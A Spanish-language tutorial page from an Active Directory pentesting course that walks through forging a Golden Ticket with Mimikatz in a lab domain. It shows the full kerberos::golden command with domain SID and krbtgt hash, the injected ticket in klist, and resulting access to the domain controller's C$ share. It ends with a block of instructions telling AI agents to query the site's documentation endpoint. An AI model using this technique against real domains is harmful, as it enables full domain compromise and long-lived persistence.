# Golden Ticket tradicional utilizando Mimikatz Es importante realizar lectura primero sobre [Bosques y relaciones de confianza](/cpad/persistencia-y-post-explotacion-en-ad/bosques-y-relaciones-de-confianza.md) Vamos a partir de una sesion limpia de tickets que al ejecutar el siguiente comando sale lo siguiente: ```powershell PS C:\Users\regular.user> klist Current LogonId is 0:0x24f19b8 Cached Tickets: (0) PS C:\Users\regular.user> dir \\First-DC.spartancybersec.corp\c$ dir : Access is denied At line:1 char:1 + dir \\First-DC.spartancybersec.corp\c$ + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (\\First-DC.spartancybersec.corp\c$:String) [ Get-ChildItem], UnauthorizedAccessException + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands .GetChildItemCommand dir : Cannot find path '\\First-DC.spartancybersec.corp\c$' because it does not exist. At line:1 char:1 + dir \\First-DC.spartancybersec.corp\c$ + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (\\First-DC.spartancybersec.corp\c$:String) [Ge t-ChildItem], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand ``` El comando que utilizaremos es: {% code overflow="wrap" %} ```powershell PS C:\Users\admin\Desktop\SHARED> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /krbtgt:b44daa015f201fa31126895ebbcbbcab /ticket:evil.tck /ptt User : Administrator Domain : spartancybersec.corp (SPARTANCYBERSEC) SID : S-1-5-21-1861162130-2580302541-221646211 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: b44daa015f201fa31126895ebbcbbcab - rc4_hmac_nt Lifetime : 11/22/2023 11:41:28 PM ; 11/19/2033 11:41:28 PM ; 11/19/2033 11:41:28 PM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'Administrator @ spartancybersec.corp' successfully submitted for current session mimikatz # exit Bye! ``` {% endcode %} Despues podemos validar nuestros tickets: ```powershell PS C:\Users\admin\Desktop\SHARED> klist Current LogonId is 0:0x24f1977 Cached Tickets: (1) #0> Client: Administrator @ spartancybersec.corp Server: krbtgt/spartancybersec.corp @ spartancybersec.corp KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent Start Time: 11/22/2023 23:41:28 (local) End Time: 11/19/2033 23:41:28 (local) Renew Time: 11/19/2033 23:41:28 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called: ``` Y para validar el exito de nuestro ticket podemos utilizar el siguiente comando: ```powershell PS C:\Users\admin\Desktop\SHARED> dir \\First-DC.spartancybersec.corp\c$ Directory: \\First-DC.spartancybersec.corp\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/14/2018 6:56 AM EFI d----- 11/18/2023 4:22 PM NTDS d----- 5/13/2020 5:58 PM PerfLogs d-r--- 9/19/2022 11:23 PM Program Files d----- 9/19/2022 11:47 PM Program Files (x86) d-r--- 9/19/2022 11:40 PM Users d----- 11/21/2023 1:27 AM Windows ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://books.spartan-cybersec.com/cpad/persistencia-y-post-explotacion-en-ad/golden-ticket/variantes-del-golden-ticket/golden-ticket-tradicional-utilizando-mimikatz.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.